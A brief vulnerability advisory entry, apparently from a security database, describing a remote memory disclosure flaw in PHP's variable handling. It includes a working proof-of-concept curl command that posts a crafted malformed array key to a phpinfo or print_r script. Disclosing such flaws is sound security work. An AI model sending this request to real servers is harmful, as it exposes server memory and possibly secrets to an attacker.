|
PHP PHP_Variables Remote Memory Disclosure Vulnerability
The following example is available: $ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print "f"x100;print "[g][=1"'` where phpinfo.php is: <? phpinfo(); ?> or some php file containing print_r function: <? print_r($_REQUEST); ?> |
|
|
Privacy Statement |